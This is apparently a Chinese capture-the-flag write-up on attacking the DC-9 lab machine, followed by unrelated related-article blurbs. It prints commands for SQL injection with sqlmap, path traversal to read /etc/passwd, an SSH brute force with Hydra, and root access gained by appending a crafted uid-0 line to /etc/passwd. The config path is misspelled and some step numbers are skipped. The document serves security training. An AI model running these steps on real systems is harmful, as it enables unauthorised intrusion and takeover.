内网渗透-DC-9靶机渗透

攻击机:kali 192.168.236.137

目标机:dc-9 192.168.236.138

一、信息收集
1.使用arp-scan -l和nmap进行主机发现和端口信息收集

nmap -sS -T5 --min-rate 10000 192.168.236.138 -sC -p-

发现22端口被阻塞

2.whatweb收集一下cms指纹信息

what http://192.168.236.138

3.访问web界面,找一找,发现search这个地方可以查询信息

这意味着与数据库产生交互,可能会有注入

尝试一下,'or 1=1 --+

这是一个sql注入,查看源码发现跳转界面是results.php,表单name为search

二、SQL注入

1.使用sqlmap -u "http://192.168.236.138/results.php" --data "search=1" --dbs 爆库名

2.使用sqlmap -u "http://192.168.236.138/results.php" --data "search=1" -D Staff -T Users --dump字段内容

爆出一个用户名和密码

admin:transorbitall

3.爆另一个库中的表的字段内容

4.使用admin登陆web界面,发现file does not exist(有可能存在文件包含)

三、文件包含(LFI)漏洞

猜测文件包含参数为file,

可以通过burp爆破一下

也可以通过FUZZ爆破

wfuzz -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

过滤

wfuzz --hw 100 -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

1.不知道在哪一层,直接填满,使用../../../../../../../切一下路径../../../../../etc/passwd

端口保护之端口敲门(knock)

就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制

3.端口敲门这个文件路径一定在/etc/konckd.conf

http://192.168.236.138/welcome.php?file=../../../../../../../../../../../../../etc/konckd.conf

4 依次使用nc或者nmap敲门

nmap再次扫描一下发现22端口开放了

6.使用之前得到的用户名和密码去爆破ssh服务(使用九头蛇hydra)

hydra -L username.txt(之前爆出的一堆用户名) -P password.txt(之前爆出的一堆密码) 192.168.236.138 ssh

7.使用janitor登陆,发现了一个密码文件

8 猜测是密码,放到之前密码文件里再次爆破,得到一个新用户

9.使用新用户登录,发现sudo -l可以使用,得到了一个可以以root身份执行的脚本

四、准备提权

1.根据提示找到脚本的位置,然后再它的前几级目录发现了它是一个python脚本,和它的使用方法

把第一个参数的内容追加到第二的参数中

2 使用openssl passwd -1 -salt admin 123456,生成一个加密的密码

3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

成功提权

得到flag

参考链接:

DC-9靶机渗透_在对靶场dc-9的渗透测试中攻击目标是什么-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/423354.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

maven项目导入mysql依赖

最近在B站跟着狂神学习Mybatis,学到P2就卡住了,搭建的maven项目一直无法导入依赖,在网上查找了很多相关的解决方法,project structure不知道点进去多少回,始终无法解决,后来把responsity文件夹删除重置了一…

vos3000外呼系统如何修改话机注册端口

本文以vos3000为例,其他产品替换对应产品名称即可 修改配置文件地址 /home/kunshi/mbx3000/etc/softswitch.conf H323_RAS_PORT1719 H323 注册端口,可以用逗号(,)分隔多个端口 H323_RC4_RAS_PORT3719 H323 加密注册端口&#x…

Unity(第二十三部)导航

你可以使用 unity官方提供的 unity导航组件或第三方 unity导航组件,以实现游戏中角色或其他物体的导航。 unity导航组件通常具有多种导航模式,如飞行模式、步行模式、车辆模式等,可以根据不同的需求选择合适的模式。同时,unity导…

Vue.js+SpringBoot开发社区买菜系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、系统设计2.1 功能模块设计2.1.1 数据中心模块2.1.2 菜品分类模块2.1.3 菜品档案模块2.1.4 菜品订单模块2.1.5 菜品收藏模块2.1.6 收货地址模块 2.2 可行性分析2.3 用例分析2.4 实体类设计2.4.1 菜品分类模块2.4.2 菜品档案模块2.4.3…

c语言数据结构(5)——栈

欢迎来到博主的专栏——C语言数据结构 博主id:代码小豪 文章目录 栈栈的顺序存储结构栈的插入空栈的初始化栈的删除判断空栈读取栈顶元素数据 实现顺序栈的所有代码栈的链式存储结构链式栈的初始化链式栈的入栈操作链式栈的出栈操作 实现链式栈的所有代码 栈 栈是…

麒麟银河操作系统V10部署ffmpeg(也能用于Linux系统)

麒麟银河操作系统V10部署ffmpeg(也能用于Linux系统) 部署ffmpeg用来处理视频的各种操作 想使用ffmpeg,要先安装nasm,yasm,x264之后,否则会报错 nkvers 查看麒麟操作系统版本 cat /proc/version #查看linux版本信息 uname -a …

基于自定义组件实现微信小程序动态tabBar,根据不同用户角色显示不同底部tabBar,支持自由组合总数超过5个(更新版)

文章目录 背景实现步骤:1、我们先在utils目录中创建tab-service.js文件,写上全局的数据及方法;2、在app.json文件中配置导航信息3、根目录下创建custom-tab-bar目录4、编写custom-tab-bar组件4.1、custom-tab-bar/index.wxml4.2、custom-tab-…

NLP算法实战项目:使用 BERT 进行文本多分类

大多数研究人员将他们的研究论文提交给学术会议,因为这是更快地使研究结果可用的途径。寻找和选择合适的会议一直是一项具有挑战性的任务,特别是对于年轻的研究人员来说。基于先前会议论文集的数据,研究人员可以增加其论文被接受和发表的机会…

手把手教测试,全网内容最全有深度-jmeter-DBC Request

5.1.7.4.JDBC Request 具体参见数据库操作章节 5.1.7.5.jpgc - Dummy Sampler 用于模拟一个接口请求,效果类似于Mock。 手把手教测试,持续更新。学习、咨询测试技术,获取完整资料加V:SobasoTest

揭秘Java性能调优的层次 | 综合多方向提升应用程序性能与系统高可用的关键(架构层次规划)

揭秘性能调优的层次 | 综合多方向提升应用程序性能与系统的高可用 前言介绍调优层次调优 — 设计案例说明 - 操作轮询控制事件驱动 调优 — 代码案例说明 - ArrayList和LinkedList性能对比案例说明 - 文件读写实现方式的性能对比 调优 — JVMJVM架构分布JVM调优方向**JVM垃圾回…

Spring注解之处理常见的 HTTP 请求

5 种常见的请求类型: GET :请求从服务器获取特定资源。举个例子:GET /users(获取所有学生)POST :在服务器上创建一个新的资源。举个例子:POST /users(创建学生)PUT :更新…

铅冶炼作业VR虚拟现实互动培训平台降低实操风险

在钢铁工业中,焦炉作业是一个关键的环节,也是一项技术要求高、操作复杂的任务。传统焦炉作业的培训通常需要在实际的焦炉上进行,这不仅对学员的身体素质和心理素质提出了较高的要求,而且也存在一定的安全风险。基于VR虚拟现实制作…

Libero集成开发环境中Identify应用与提高

Libero集成开发环境中Identify应用与提高 Identify的安装

专业130+总分410+上海交通大学819信号系统与信号处理考研上交电子信息通信生医电科,真题,大纲,参考书。

今年考研顺利结束,我也完成了目前人生最大的逆袭,跨了两个层级跨入c9,专业课819信号系统与信息处理135,数一130总分410,考上上海交大,回想这一年经历了很多,也成长了很多。从周围朋友&#xff0…

运筹学_1.2线性规划问题的几何意义

1.2线性规划问题的几何意义 一、凸集的基本概念二、由线性规划问题的几何意义、定理得出的几点结论三、引出单纯形法的解题步骤 一、凸集的基本概念 通俗来说,一个图形上任意两个点的连线上的点全部存在于这个图形中 二、由线性规划问题的几何意义、定理得出的几点结…

latex报错I was expecting a `,‘ or a `}‘的解决办法

解决办法——经过检查在ref22后面缺少一个逗号 总结 当你在使用LaTeX时遇到“I was expecting a , or a }”这样的错误,这通常意味着LaTeX在解析你的代码时,预期在某个位置看到一个逗号(,)或一个大括号(})…

AI时代来临:解锁大模型的神秘面纱!

在AI时代的黎明,大模型技术的发展不仅仅是科技进步的一个标志,更是人类文明新篇章的开启。这篇文章旨在揭开大模型的神秘面纱,探索其对未来社会的深远影响。 大模型,作为人工智能领域的一个重要分支,其核心在于构建能…

java List.forEach 引发的生产投诉

代码运行时直接抛异常报错,这个算是不幸中的万幸,至少可以及时发现并去解决代码运行不报错,但是业务逻辑莫名其妙的出现各种奇怪问题,这种就比较悲剧了,因为这个问题稍不留神的话,可能就会给后续业务埋下隐…

Vue3 循环渲染 v-for

v-for 指令:用于循环渲染列表数据。 v-for 指令:可以循环数组、对象、字符串【不常用】、指定次数【很少用】。 key 属性:用于给标签添加一个唯一的标识。 key 属性:推荐使用 id、手机号、身份证号、学号 等唯一值。 注&#…

ora2pg使用教程

简介 ora2pg是一个迁移工具,是将oracle数据库迁移到postgres的一个强大的工具 安装及使用 拉取镜像 docker pull georgmoser/ora2pg 如果拉取比较慢,可以使用上面绑定的镜像文件 使用加载镜像命令 docker load -i ora2gp.tar 使用镜像文件很方便&…